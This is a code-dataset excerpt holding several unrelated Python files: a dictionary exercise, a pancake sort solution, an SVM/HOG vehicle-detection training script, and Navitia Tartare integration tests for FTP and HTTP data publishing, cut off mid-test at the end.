persist.view_did_close(vid)\n\n\nclass sublimelinter_edit(sublime_plugin.TextCommand):\n \"\"\"A plugin command used to generate an edit object for a view.\"\"\"\n def run(self, edit):\n persist.edit(self.view.id(), edit)\n","sub_path":"sublimelinter.py","file_name":"sublimelinter.py","file_ext":"py","file_size_in_byte":11854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"396449636","text":"## 1. \n# x = [[5,2,3],[10,8,9]]\n# x[1][0] = 15\n# print(x)\n\n# students = [\n# {'first_name': 'Michael', 'last_name' : 'Jordan'},\n# {'first_name' : 'John', 'last_name' : 'Rosales'}\n# ]\n# students[0]['last_name']='Bryant'\n# print(students)\n\n# sports_directory = {\n# 'basketball' : ['Kobe', 'Jordan', 'James', 'Curry'],\n# 'soccer' : ['Messi', 'Ronaldo', 'Rooney']\n# }\n\n# sports_directory['soccer'][0] = 'Andres'\n# print(sports_directory['soccer'][0], sports_directory['soccer'])\n# z = [ {'x': 10, 'y': 20} ]\n# z[0]['y']=30\n# print(z)\n\n# ## 2.\n# students = [\n# {'first_name': 'Michael', 'last_name' : 'Jordan'},\n# {'first_name' : 'John', 'last_name' : 'Rosales'},\n# {'first_name' : 'Mark', 'last_name' : 'Guillen'},\n# {'first_name' : 'KB', 'last_name' : 'Tonel'}\n# ]\n# for i in range(len(students)):\n# print(\"first_name: \", students[i]['first_name'],', ', \"Last_name: \", students[i]['last_name'])\n\n# ## 3.\n# students = [\n# {'first_name': 'Michael', 'last_name' : 'Jordan'},\n# {'first_name' : 'John', 'last_name' : 'Rosales'},\n# {'first_name' : 'Mark', 'last_name' : 'Guillen'},\n# {'first_name' : 'KB', 'last_name' : 'Tonel'}\n# ]\n# def iterateDictionary(keyName, listName):\n# for i in range(len(listName)):\n# print(listName[i][keyName])\n\n# iterateDictionary('first_name', students)\n\n# def iterateDictionary(keyName, listName):\n# for i in range(len(listName)):\n# print(listName[i][keyName])\n\n# iterateDictionary('last_name', students)\n\n## 4.\ndojo = {\n 'locations': ['San Jose', 'Seattle', 'Dallas', 'Chicago', 'Tulsa', 'DC', 'Burbank'],\n 'instructors': ['Michael', 'Amy', 'Eduardo', 'Josh', 'Graham', 'Patrick', 'Minh', 'Devon']\n}\n# print name of each key, size of key, print associated alues with eah key\n# for x in range(len(dojo.get('locations'))):\n# print(dojo.get('locations')[x])\n# for x in range(len(dojo.get('instructors'))):\n# print(dojo.get('instructors')[x])\n\n# print(len(dojo['locations']))\n\nfor key in dojo:\n print(len(dojo[key]), key)\n for i in range(len(dojo[key])):\n print(dojo.get(key)[i])\n\n\n\n\n","sub_path":"python_stack/python/fundamentals/functionIntermediate2.py","file_name":"functionIntermediate2.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"465214910","text":"# Pancake Sort\n\n# given an array arr, and flip(arr, k) that flips the first k elements,\n# create a method that sorts and returns sorted array\n\n# Example\n# [1,3,1] -> biggest before x = 3\n# x\n#\n# [3,1,1]\n#\n# [1,1,3] flip!\n#\n#\n# cases\n# 1. when the arr is empty\n# 2. when the arr has length == 1\n# 3. when the arr has length > 1\n\n\n# pseudocode\n# 1. if arr is empty, then return arr\n# 2. if arr has length == 1, then return arr\n# 3. if arr has length > 1,\n# 3.1 starting index from the last element in the arr, find maximum elements in [:index]\n# 3.2 if maximum > last_element, then flip to first then to last\n# 3.2 decrement index\n# 4. if index == 1, then terminate\n#\n# return arr\n\n\nclass Solution:\n def solve(self, arr):\n # 1. if arr is empty, then return arr\n if len(arr) == 0:\n return arr\n\n # 2. if arr has length == 1, then return arr\n if len(arr) == 1:\n return arr\n\n index = len(arr) - 1\n\n while index > 0:\n # 3. if arr has length > 1,\n # 3.1 starting index from the last element in the arr, find maximum elements in [:index]\n maximum, index_maximum = self.get_index_maximum(arr, index)\n # 3.2 if maximum > last_element, then flip to first then to last\n if maximum > arr[index]:\n self.flip(arr, index_maximum)\n self.flip(arr, index)\n\n print(arr)\n index -= 1\n\n return arr\n\n def get_index_maximum(self, arr, index_end):\n index = 0\n index_maximum = 0\n maximum = arr[index]\n\n while index < index_end:\n if maximum < arr[index]:\n maximum = arr[index]\n index_maximum = index\n index += 1\n\n return maximum, index_maximum\n\n def flip(self, arr, k):\n index = 0\n index_end = k // 2\n\n while index <= index_end:\n arr[index], arr[k - index] = arr[k - index] , arr[index]\n index += 1\n\nif __name__ == '__main__':\n case_1 = [1]\n case_2 = [1,2]\n case_3 = [1,3,1]\n case_4 = [3,1,2,4,6,5]\n case_5 = [10,9,8,7,6,5,4,3,2,1]\n case_6 = [10,9,8,6,7,5,4,3,2,1,9,10,8,7,6,5,4,3,2,1,10,9,8,7,6,5,4,3,2,1]\n\n\n expected_1 = [1]\n expected_2 = [1,2]\n expected_3 = [1,1,3]\n expected_4 = [1,2,3,4,5,6]\n expected_5 = [1,2,3,4,5,6,7,8,9,10]\n expected_6 = [1, 1, 1, 2, 2, 2, 3, 3, 3, 4, 4, 4, 5, 5, 5, 6, 6, 6, 7, 7, 7, 8, 8, 8, 9, 9, 9, 10, 10, 10]\n\n solution_1 = Solution().solve(case_1)\n solution_2 = Solution().solve(case_2)\n solution_3 = Solution().solve(case_3)\n print(solution_3)\n solution_4 = Solution().solve(case_4)\n solution_5 = Solution().solve(case_5)\n solution_6 = Solution().solve(case_6)\n\n assert expected_1 == solution_1\n assert expected_2 == solution_2\n assert expected_3 == solution_3\n assert expected_4 == solution_4\n assert expected_5 == solution_5\n assert expected_6 == solution_6\n\n\n","sub_path":"pramp/pancake_sort/pancake_sort_01.py","file_name":"pancake_sort_01.py","file_ext":"py","file_size_in_byte":3017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"438654678","text":"import matplotlib.image as mpimg\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\nimport glob\nimport time\nfrom sklearn.svm import LinearSVC\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.externals import joblib\nfrom skimage.feature import hog\nimport pickle\n\nfrom utility import *\n\n# NOTE: the next import is only valid for scikit-learn version <= 0.17\n# for scikit-learn >= 0.18 use:\n# from sklearn.model_selection import train_test_split\nfrom sklearn.cross_validation import train_test_split\n\nfrom scipy.ndimage.measurements import label\n\n##### HOG features:\nprint(\"---- Visualize the HOG features for a car image ----\")\n# Define the HOG parameters:\norientation = 9\npix_per_cell = 8\ncell_per_block = 2\n\nimg = mpimg.imread('vehicles/GTI_MiddleClose/image0003.png')\ngray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\nfeatures, hog_image = get_hog_features(gray,orient=orientation,\n pix_per_cell=pix_per_cell,cell_per_block=cell_per_block,\n vis=True,feature_vec=True)\nfig = plt.figure()\nplt.subplot(121)\nplt.imshow(img, cmap='gray')\nplt.title('Example Car Image')\nplt.subplot(122)\nplt.imshow(hog_image, cmap='gray')\nplt.title('HOG Visualization')\nplt.show()\n\nprint(\"---- Visualize the HOG features for a no-car image ----\")\nimg = mpimg.imread('non-vehicles/Extras/extra26.png')\ngray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\nfeatures, hog_image = get_hog_features(gray,orient=orientation,\n pix_per_cell=pix_per_cell,cell_per_block=cell_per_block,\n vis=True,feature_vec=True)\nfig = plt.figure()\nplt.subplot(121)\nplt.imshow(img, cmap='gray')\nplt.title('Example no-Car Image')\nplt.subplot(122)\nplt.imshow(hog_image, cmap='gray')\nplt.title('HOG Visualization')\nplt.show()\n\n##### Feature extraction\nprint(\"---- Feature extraction ---- \")\n\n\n# Read in cars and notcars\ncar_images = glob.glob('vehicles/**/*.png', recursive=True)\nnon_car_images = glob.glob('non-vehicles/**/*.png', recursive=True)\n\ncars = []\nnotcars = []\n\nfor image in car_images:\n cars.append(image)\nprint(\"car image: \", len(cars))\nfor image in non_car_images:\n notcars.append(image)\nprint(\"non car image: \", len(notcars))\n\ncolor_space = 'YCrCb'\nspatial_size = (32,32)\nhist_bins = 32\norient = 9\npix_per_cell = 8\ncell_per_block = 2\nhog_channel = \"ALL\"\nspatial_feat = True\nhist_feat = True\nhog_feat = True\n\ny_start_stop = [350, None] # Min and max in y to search in slide_window()\nx_start_stop = [500, None]\n\nprint(\"extracting car image set features ... ... \")\ncar_features = extract_features(cars, color_space=color_space,\n spatial_size=spatial_size, hist_bins=hist_bins,\n orient=orient, pix_per_cell=pix_per_cell,\n cell_per_block=cell_per_block,\n hog_channel=hog_channel, spatial_feat=spatial_feat,\n hist_feat=hist_feat, hog_feat=hog_feat)\n\nprint(\"extracting non car image set features ... ... \")\nnotcar_features = extract_features(notcars, color_space=color_space,\n spatial_size=spatial_size, hist_bins=hist_bins,\n orient=orient, pix_per_cell=pix_per_cell,\n cell_per_block=cell_per_block,\n hog_channel=hog_channel, spatial_feat=spatial_feat,\n hist_feat=hist_feat, hog_feat=hog_feat)\n\n# Create an array stack of feature vectors\nX = np.vstack((car_features, notcar_features)).astype(np.float64)\n# Define the labels vector\ny = np.hstack((np.ones(len(car_features)), np.zeros(len(notcar_features))))\n\n# Split up data into randomized training and test sets\nrand_state = np.random.randint(0, 100)\nX_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.2, random_state=rand_state)\n\n# Fit a per-column scaler\nX_scaler = StandardScaler().fit(X_train)\n# Apply the scaler to X\nX_train = X_scaler.transform(X_train)\nX_test = X_scaler.transform(X_test)\n\nprint(\"spatical bins: \", spatial_size[0])\nprint(\"hist bins: \", hist_bins)\nprint(\"HOG orientations: \", orient)\nprint(\"pix per cell: \", pix_per_cell)\nprint(\"cell per block: \", cell_per_block)\nprint(\"feature length: \", len(X_train[0]))\n\nprint(\"---- fitting the model ----\")\n# Use a linear SVC\nsvc = LinearSVC()\n# Check the training time for the SVC\nt=time.time()\nsvc.fit(X_train, y_train)\nt2 = time.time()\nprint(round(t2-t, 2), 'Seconds to train SVC...')\n# Check the score of the SVC\nprint('Test Accuracy of SVC = ', round(svc.score(X_test, y_test), 4))\n\nprint(\"---- verify on the test set ---- \")\nt=time.time()\nn_predict = 10\nprint('My SVC predicts: ', svc.predict(X_test[0:n_predict]))\nprint('For these',n_predict, 'labels: ', y_test[0:n_predict])\nt2 = time.time()\nprint(round(t2-t, 5), 'seconds to predict', n_predict,'labels with SVC')\n\nprint(\"---- save the training model and the training parameters ---- \")\nfilename = \"svm_model/svm.pkl\"\njoblib.dump(svc, filename)\npickle.dump(X,open(\"svm_model/X_data.pkl\",\"wb\"))\npickle.dump(y,open(\"svm_model/y_data.pkl\",\"wb\"))\npickle.dump(X_scaler, open(\"svm_model/X_scaler.pkl\",\"wb\"))\n\ndata={\n 'svc': svc,\n 'X_scaler': X_scaler,\n 'color_space': color_space,\n 'orient': orient,\n 'pix_per_cell': pix_per_cell,\n 'cell_per_block': cell_per_block,\n 'spatial_size' : spatial_size,\n 'hist_bins': hist_bins,\n 'hog_channel': hog_channel\n }\n\nwith open('svm_model/model-params.pk', 'wb') as pFile:\n pickle.dump(data, pFile)\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"637464702","text":"# coding=utf-8\n\n# Copyright (c) 2001-2016, Canal TP and/or its affiliates. All rights reserved.\n#\n# This file is part of Navitia,\n# the software to build cool stuff with public transport.\n#\n# Hope you'll enjoy and contribute to this project,\n# powered by Canal TP (www.canaltp.fr).\n# Help us simplify mobility and open public transport:\n# a non ending quest to the responsive locomotion way of traveling!\n#\n# LICENCE: This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n# Stay tuned using\n# twitter @navitia\n# IRC #navitia on freenode\n# https://groups.google.com/d/forum/navitia\n# www.navitia.io\nimport copy\nimport ftplib\nimport json\nimport os\nimport tempfile\n\nimport mock\nimport pytest\nfrom freezegun import freeze_time\n\nfrom tartare.core.constants import (\n DATA_FORMAT_OSM_FILE,\n DATA_TYPE_PUBLIC_TRANSPORT,\n DATA_TYPE_GEOGRAPHIC,\n DATA_FORMAT_POLY_FILE,\n DATA_FORMAT_GTFS,\n DATA_FORMAT_NTFS,\n PUBLICATION_ENVIRONMENTS,\n)\nfrom tests.integration.test_mechanism import TartareFixture\nfrom tests.utils import get_response, assert_files_equals, _get_file_fixture_full_path\n\n\nclass TestDataPublisher(TartareFixture):\n def _create_contributor(\n self, id, url=\"http://canaltp.fr/gtfs.zip\", data_format=\"gtfs\", data_type=DATA_TYPE_PUBLIC_TRANSPORT\n ):\n contributor = {\n \"data_type\": data_type,\n \"id\": id,\n \"name\": id,\n \"data_prefix\": id,\n \"data_sources\": [\n {\n \"id\": \"ds_\" + data_format,\n \"name\": \"ds\" + data_format,\n \"data_format\": data_format,\n \"input\": {\n \"expected_file_name\": \"default.zip\",\n \"type\": \"auto\",\n \"url\": url,\n \"frequency\": {\"type\": \"daily\", \"hour_of_day\": 20},\n },\n }\n ],\n }\n resp = self.post(\"/contributors\", json.dumps(contributor))\n assert resp.status_code == 201\n return resp\n\n def test_publish_ftp(self, wiremock_server, init_ftp_upload_server):\n contributor_id = \"fr-idf\"\n coverage_id = \"default\"\n filename = \"some_archive.zip\"\n url = self.format_url(ip=wiremock_server.ip_addr, filename=filename)\n self._create_contributor(contributor_id, url)\n publication_platform = {\n \"environment\": \"production\",\n \"url\": \"ftp://\" + init_ftp_upload_server.ip_addr,\n \"input_data_source_ids\": [\"ds_gtfs\"],\n \"options\": {\n \"authent\": {\"username\": init_ftp_upload_server.user, \"password\": init_ftp_upload_server.password}\n },\n }\n self.init_coverage(coverage_id, publications=[publication_platform])\n\n self.full_export(contributor_id, coverage_id, \"2015-08-10T00:00:00Z\")\n\n # check if the file was successfully uploaded\n session = ftplib.FTP(\n init_ftp_upload_server.ip_addr, init_ftp_upload_server.user, init_ftp_upload_server.password\n )\n directory_content = session.nlst()\n assert len(directory_content) == 1\n assert \"{coverage_id}.zip\".format(coverage_id=coverage_id) in directory_content\n session.delete(\"{coverage_id}.zip\".format(coverage_id=coverage_id))\n session.quit()\n\n @freeze_time(\"2015-08-10\")\n def test_publish_ftp_with_directory(self, wiremock_server, init_ftp_upload_server):\n contributor_id = \"fr-idf\"\n coverage_id = \"default\"\n ftp_username = \"tartare_user\"\n ftp_password = \"tartare_password\"\n filename = \"some_archive.zip\"\n directory = \"/ods\"\n\n session = ftplib.FTP(init_ftp_upload_server.ip_addr, ftp_username, ftp_password)\n # Create a directory in the ftp\n session.mkd(directory)\n\n url = self.format_url(ip=wiremock_server.ip_addr, filename=filename)\n self._create_contributor(contributor_id, url)\n # see password : tests/fixtures/authent/ftp_upload_users/pureftpd.passwd\n publication_platform = {\n \"environment\": \"production\",\n \"url\": \"ftp://\" + init_ftp_upload_server.ip_addr,\n \"input_data_source_ids\": [\"ds_gtfs\"],\n \"options\": {\"authent\": {\"username\": ftp_username, \"password\": ftp_password}, \"directory\": directory},\n }\n self.init_coverage(coverage_id, publications=[publication_platform])\n\n self.full_export(contributor_id, coverage_id)\n\n # check if the file was successfully uploaded\n directory_content = session.nlst(directory)\n assert len(directory_content) == 1\n assert \"{coverage_id}.zip\".format(coverage_id=coverage_id) in directory_content\n session.delete(\"{directory}/{coverage_id}.zip\".format(directory=directory, coverage_id=coverage_id))\n session.rmd(directory)\n\n @mock.patch(\"tartare.processes.fusio.Fusio.wait_for_action_terminated\")\n @mock.patch(\"requests.post\")\n @mock.patch(\"requests.get\")\n @freeze_time(\"2018-05-14\")\n def test_process_compute_ods_with_metadata_fusio(\n self, fusio_get, fusio_post, wait_for_action_terminated, wiremock_server, init_ftp_upload_server\n ):\n contributor_id = \"id_test\"\n coverage_id = \"my-coverage-id\"\n sample_data = \"some_archive.zip\"\n url = self.format_url(ip=wiremock_server.ip_addr, filename=sample_data, path=\"gtfs\")\n self.init_contributor(contributor_id, \"my_gtfs\", url)\n fusio_end_point = \"http://fusio-ihm.canaltp.fr/cgi-bin/fusio.dll\"\n processes = []\n input_data_source_ids = []\n for target_data_format in [DATA_FORMAT_GTFS, DATA_FORMAT_NTFS]:\n target_id = \"my_{}_data_source\".format(target_data_format)\n input_data_source_ids.append(target_id)\n processes.append(\n {\n \"id\": \"fusio_export\",\n \"type\": \"FusioExport\",\n \"target_data_source_id\": target_id,\n \"parameters\": {\"fusio_url\": fusio_end_point, \"export_data_format\": target_data_format},\n \"sequence\": 0,\n }\n )\n self.contributor_export(contributor_id)\n processes.append(\n {\n \"id\": \"compute-ods\",\n \"type\": \"ComputeODS\",\n \"input_data_source_ids\": input_data_source_ids,\n \"target_data_source_id\": \"ods_target_id\",\n \"sequence\": 2,\n }\n )\n publication_platform = {\n \"environment\": \"production\",\n \"url\": \"ftp://\" + init_ftp_upload_server.ip_addr,\n \"options\": {\n \"authent\": {\"username\": init_ftp_upload_server.user, \"password\": init_ftp_upload_server.password}\n },\n \"input_data_source_ids\": [\"ods_target_id\"],\n }\n license = {\"name\": \"my license\", \"url\": \"http://license.org/mycompany\"}\n self.init_coverage(coverage_id, processes, [publication_platform], license)\n\n fetch_url_gtfs = self.format_url(ip=wiremock_server.ip_addr, filename=sample_data)\n fetch_url_ntfs = self.format_url(ip=wiremock_server.ip_addr, path=\"\", filename=\"ntfs.zip\")\n fusio_post.side_effect = [\n get_response(200, self.get_fusio_response_from_action_id(\"gtfs-action-id\")),\n get_response(200, self.get_fusio_response_from_action_id(\"ntfs-action-id\")),\n ]\n fusio_get.side_effect = [\n get_response(200, self.get_fusio_export_url_response_from_action_id(\"gtfs-action-id\", fetch_url_gtfs)),\n get_response(200, self.get_fusio_export_url_response_from_action_id(\"ntfs-action-id\", fetch_url_ntfs)),\n ]\n self.full_export(contributor_id, coverage_id)\n\n def test_ods_file_exist(extract_path):\n expected_filename = \"ods_target_id.zip\".format(coverage_id=coverage_id)\n session = ftplib.FTP(\n init_ftp_upload_server.ip_addr, init_ftp_upload_server.user, init_ftp_upload_server.password\n )\n\n directory_content = session.nlst()\n assert len(directory_content) == 1\n assert expected_filename in directory_content\n\n transfered_full_name = os.path.join(extract_path, \"transfered_file.zip\")\n with open(transfered_full_name, \"wb\") as dest_file:\n session.retrbinary(\n \"RETR {expected_filename}\".format(expected_filename=expected_filename), dest_file.write\n )\n session.delete(expected_filename)\n session.quit()\n\n return transfered_full_name\n\n self.assert_ods_metadata(coverage_id, test_ods_file_exist)\n\n @freeze_time(\"2015-08-10\")\n @mock.patch(\"requests.post\", side_effect=[get_response(200), get_response(200), get_response(200)])\n def test_publish_environment_respect_sequence_order(self, mock_post, wiremock_server):\n contributor_id = \"contrib-seq\"\n cov_id = \"cov-sequence\"\n url = \"http://whatever.{env}/v0/jobs/il\"\n\n self._create_contributor(contributor_id, self.format_url(ip=wiremock_server.ip_addr, filename=\"sample_1.zip\"))\n publication_platform = {\"environment\": \"production\", \"url\": url, \"input_data_source_ids\": [\"ds_gtfs\"]}\n publications = []\n for environment in PUBLICATION_ENVIRONMENTS:\n temp_platform = copy.copy(publication_platform)\n temp_platform[\"url\"] = temp_platform[\"url\"].format(env=environment)\n temp_platform[\"environment\"] = environment\n publications.append(temp_platform)\n self.init_coverage(cov_id, publications=publications)\n self.full_export(contributor_id, cov_id)\n for idx, environment in enumerate(PUBLICATION_ENVIRONMENTS):\n assert url.format(env=environment) == mock_post.call_args_list[idx][0][0]\n\n @freeze_time(\"2015-08-10\")\n @mock.patch(\"requests.post\", side_effect=[get_response(200), get_response(500), get_response(200)])\n def test_publish_platform_failed(self, mock_post, wiremock_server):\n contributor_id = \"contrib-pub-failed\"\n cov_id = \"cov-sequence\"\n url = \"http://whatever.fr/pub\"\n self._create_contributor(contributor_id, self.format_url(ip=wiremock_server.ip_addr, filename=\"sample_1.zip\"))\n publication_platform = {\"url\": url, \"input_data_source_ids\": [\"ds_gtfs\"]}\n publications = []\n for environment in PUBLICATION_ENVIRONMENTS:\n temp_plat = copy.deepcopy(publication_platform)\n temp_plat[\"environment\"] = environment\n temp_plat[\"id\"] = \"id_\" + environment\n publications.append(temp_plat)\n\n self.init_coverage(cov_id, publications=publications)\n resp = self.full_export(contributor_id, cov_id)\n\n resp = self.get(\"/jobs/{}\".format(self.json_to_dict(resp)[\"job\"][\"id\"]))\n job = self.json_to_dict(resp)[\"jobs\"][0]\n assert job[\"step\"].startswith(\"publish_data preproduction on \"), print(job)\n assert (\n job[\"error_message\"]\n == \"following publications failed: id_preproduction with message error during publishing on http://whatever.fr/pub, status code => 500\"\n ), print(job)\n assert job[\"state\"] == \"failed\"\n\n @freeze_time(\"2015-08-10\")\n @mock.patch(\n \"requests.post\",\n side_effect=[get_response(200), get_response(500), get_response(200), get_response(500), get_response(200)],\n )\n def test_publish_platform_failed_multi(self, mock_post, wiremock_server):\n contributor_id = \"contrib-pub-failed\"\n cov_id = \"cov-sequence\"\n url = \"http://whatever.fr/pub\"\n self._create_contributor(contributor_id, self.format_url(ip=wiremock_server.ip_addr, filename=\"sample_1.zip\"))\n publications = [\n {\"url\": url, \"input_data_source_ids\": [\"ds_gtfs\"], \"environment\": \"integration\", \"id\": \"integration_ok\"},\n {\"url\": url, \"input_data_source_ids\": [\"ds_gtfs\"], \"environment\": \"preproduction\", \"id\": \"preprod_ko_1\"},\n {\"url\": url, \"input_data_source_ids\": [\"ds_gtfs\"], \"environment\": \"preproduction\", \"id\": \"preprod_ok\"},\n {\"url\": url, \"input_data_source_ids\": [\"ds_gtfs\"], \"environment\": \"preproduction\", \"id\": \"preprod_ko_2\"},\n {\"url\": url, \"input_data_source_ids\": [\"ds_gtfs\"], \"environment\": \"production\", \"id\": \"prod_not_called\"},\n ]\n self.init_coverage(cov_id, publications=publications)\n resp = self.full_export(contributor_id, cov_id)\n # production not called but all of preprod yes\n assert mock_post.call_count == 4\n\n resp = self.get(\"/jobs/{}\".format(self.json_to_dict(resp)[\"job\"][\"id\"]))\n job = self.json_to_dict(resp)[\"jobs\"][0]\n assert job[\"step\"].startswith(\"publish_data preproduction on \"), print(job)\n assert (\n job[\"error_message\"]\n == \"following publications failed: preprod_ko_1 with message error during publishing on http://whatever.fr/pub, status code => 500 / preprod_ko_2 with message error during publishing on http://whatever.fr/pub, status code => 500\"\n ), print(job)\n assert job[\"state\"] == \"failed\"\n\n @mock.patch(\"requests.post\", side_effect=[get_response(200)])\n def test_publish_http(self, post_mock, wiremock_server):\n publish_url = \"http://tyr.whatever.com\"\n contributor_id = \"fr-idf\"\n coverage_id = \"default\"\n filename = \"some_archive.zip\"\n fetch_url = self.format_url(ip=wiremock_server.ip_addr, filename=filename)\n self._create_contributor(contributor_id, fetch_url)\n publication_platform = {\"environment\": \"production\", \"url\": publish_url, \"input_data_source_ids\": [\"ds_gtfs\"]}\n self.init_coverage(coverage_id, publications=[publication_platform])\n\n resp = self.full_export(contributor_id, coverage_id, \"2015-08-10T00:00:00Z\")\n\n post_mock.assert_called_once()\n\n resp = self.get(\"/jobs/{}\".format(self.json_to_dict(resp)[\"job\"][\"id\"]))\n job = self.json_to_dict(resp)[\"jobs\"][0]\n assert job[\"step\"].startswith(\"publish_data production on \"), print(job)\n assert job[\"error_message\"] == \"\", print(job)\n assert job[\"state\"] == \"done\", print(job)\n\n @mock.patch(\"requests.post\", side_effect=[get_response(200), get_response(200)])\n @pytest.mark.parametrize(\n \"data_format,file_name\",\n [(DATA_FORMAT_OSM_FILE, \"empty_pbf.osm.pbf\"), (DATA_FORMAT_POLY_FILE, \"ile-de-france.poly\")],\n )\n def test_publish_navitia_with_osm_or_poly(self, post_mock, wiremock_server, data_format, file_name):\n publish_url = \"http://tyr.whatever.com\"\n contributor_id = \"fr-idf\"\n coverage_id = \"default\"\n filename = \"some_archive.zip\"\n contributor_geo = \"geo\"\n fetch_url = self.format_url(ip=wiremock_server.ip_addr, filename=filename)\n self._create_contributor(contributor_id, fetch_url)\n fetch_url = self.format_url(ip=wiremock_server.ip_addr, path=\"geo_data\", filename=file_name)\n self._create_contributor(contributor_geo, fetch_url, data_format=data_format, data_type=DATA_TYPE_GEOGRAPHIC)\n publication_platform = {\n \"environment\": \"production\",\n \"url\": publish_url,\n \"input_data_source_ids\": [\"ds_gtfs\", \"ds_\" + data_format],\n }\n self.init_coverage(coverage_id, publications=[publication_platform])\n\n self.contributor_export(contributor_id)\n self.contributor_export(contributor_geo)\n resp = self.coverage_export(coverage_id)\n\n assert post_mock.call_count == 2\n\n resp = self.get(\"/jobs/{}\".format(self.json_to_dict(resp)[\"job\"][\"id\"]))\n job = self.json_to_dict(resp)[\"jobs\"][0]\n assert job[\"step\"].startswith(\"publish_data production on \"), print(job)\n assert job[\"error_message\"] == \"\", print(job)\n assert job[\"state\"] == \"done\", print(job)\n\n @mock.patch(\"requests.post\", side_effect=[get_response(200), get_response(200), get_response(200)])\n def test_publish_navitia_with_osm_and_poly(self, post_mock, wiremock_server):\n publish_url = \"http://tyr.whatever.com\"\n contributor_id = \"fr-idf\"\n coverage_id = \"default\"\n filename = \"some_archive.zip\"\n contributor_geo_id = \"geo\"\n fetch_url = self.format_url(ip=wiremock_server.ip_addr, filename=filename)\n self.init_contributor(contributor_id, \"gtfs_ds_id\", fetch_url)\n fetch_url = self.format_url(ip=wiremock_server.ip_addr, path=\"geo_data\", filename=\"empty_pbf.osm.pbf\")\n self.init_contributor(\n contributor_geo_id, \"osm_ds_id\", fetch_url, data_format=DATA_FORMAT_OSM_FILE, data_type=DATA_TYPE_GEOGRAPHIC\n )\n fetch_url = self.format_url(ip=wiremock_server.ip_addr, path=\"geo_data\", filename=\"ile-de-france.poly\")\n self.add_data_source_to_contributor(\n contributor_geo_id, \"poly_ds_id\", fetch_url, data_format=DATA_FORMAT_POLY_FILE\n )\n\n publication_platform = {\n \"environment\": \"production\",\n \"url\": publish_url,\n \"input_data_source_ids\": [\"gtfs_ds_id\", \"poly_ds_id\"],\n }\n self.init_coverage(coverage_id, publications=[publication_platform])\n\n self.contributor_export(contributor_id)\n self.contributor_export(contributor_geo_id)\n resp = self.coverage_export(coverage_id)\n\n assert post_mock.call_count == 2\n\n resp = self.get(\"/jobs/{}\".format(self.json_to_dict(resp)[\"job\"][\"id\"]))\n job = self.json_to_dict(resp)[\"jobs\"][0]\n assert job[\"step\"].startswith(\"publish_data production on \"), print(job)\n assert job[\"error_message\"] == \"\", print(job)\n assert job[\"state\"] == \"done\", print(job)\n\n @mock.patch(\"requests.post\")\n @pytest.mark.parametrize(\n \"data_format,file_name\",\n [(DATA_FORMAT_OSM_FILE, \"empty_pbf.osm.pbf\"), (DATA_FORMAT_POLY_FILE, \"ile-de-france.poly\")],\n )\n def test_publish_only_osm_or_poly(self, post_mock, wiremock_server, data_format, file_name):\n publish_url = \"http://tyr.whatever.com\"\n coverage_id = \"default\"\n contributor_geo = \"geo\"\n fetch_url = self.format_url(ip=wiremock_server.ip_addr, path=\"geo_data\", filename=file_name)\n self._create_contributor(contributor_geo, fetch_url, data_format=data_format, data_type=DATA_TYPE_GEOGRAPHIC)\n publication_platform = {\n \"environment\": \"production\",\n \"url\": publish_url,\n \"input_data_source_ids\": [\"ds_\" + data_format],\n }\n self.init_coverage(coverage_id, publications=[publication_platform])\n self.full_export(contributor_geo, coverage_id, \"2015-08-10T00:00:00Z\")\n\n assert post_mock.call_count == 1\n\n def test_publish_modified_fixture_from_contributor_process(self, init_ftp_upload_server, wiremock_server):\n self.init_contributor(\n \"c1\", \"ds1\", self.format_url(wiremock_server.ip_addr, \"minimal_gtfs.zip\"), expected_file_name=\"cov_id.zip\"\n )\n self.add_data_source_to_contributor(\n \"c1\",\n \"dcid\",\n self.format_url(\n wiremock_server.ip_addr,\n \"sanitize_publish_modified_fixture_from_contributor_process.json\",\n path=\"sanitize_gtfs\",\n ),\n \"sanitize_config\",\n )\n self.add_process_to_contributor(\n {\n \"sequence\": 0,\n \"input_data_source_ids\": [\"ds1\"],\n \"target_data_source_id\": \"export_id\",\n \"type\": \"SanitizeGTFS\",\n \"configuration_data_sources\": [{\"name\": \"sanitize_config\", \"ids\": [\"dcid\"]}],\n },\n \"c1\",\n )\n self.contributor_export(\"c1\")\n self.init_coverage(\"cov_id\")\n publication_platform = {\n \"environment\": \"production\",\n \"url\": \"ftp://\" + init_ftp_upload_server.ip_addr,\n \"input_data_source_ids\": [\"export_id\"],\n \"options\": {\n \"authent\": {\"username\": init_ftp_upload_server.user, \"password\": init_ftp_upload_server.password}\n },\n }\n self.add_publication_platform_to_coverage(publication_platform, \"cov_id\")\n self.coverage_export(\"cov_id\")\n # check that export_id data set is the updated gtfs\n export_gridfs_id = self.get_gridfs_id_from_data_source(\"c1\", \"export_id\")\n export_fixture = \"gtfs/minimal_gtfs_and_agency.zip\"\n self.assert_gridfs_equals_fixture(export_gridfs_id, export_fixture)\n # check that ds1 data set is the original gtfs\n input_gridfs_id = self.get_gridfs_id_from_data_source(\"c1\", \"ds1\")\n input_fixture = \"gtfs/minimal_gtfs.zip\"\n self.assert_gridfs_equals_fixture(input_gridfs_id, input_fixture)\n # check that published data set is the updated gtfs\n session = ftplib.FTP(\n init_ftp_upload_server.ip_addr, init_ftp_upload_server.user, init_ftp_upload_server.password\n )\n\n directory_content = session.nlst()\n assert len(directory_content) == 1\n expected_filename = \"export_id.zip\"\n assert expected_filename in directory_content\n\n # check that meta data from file 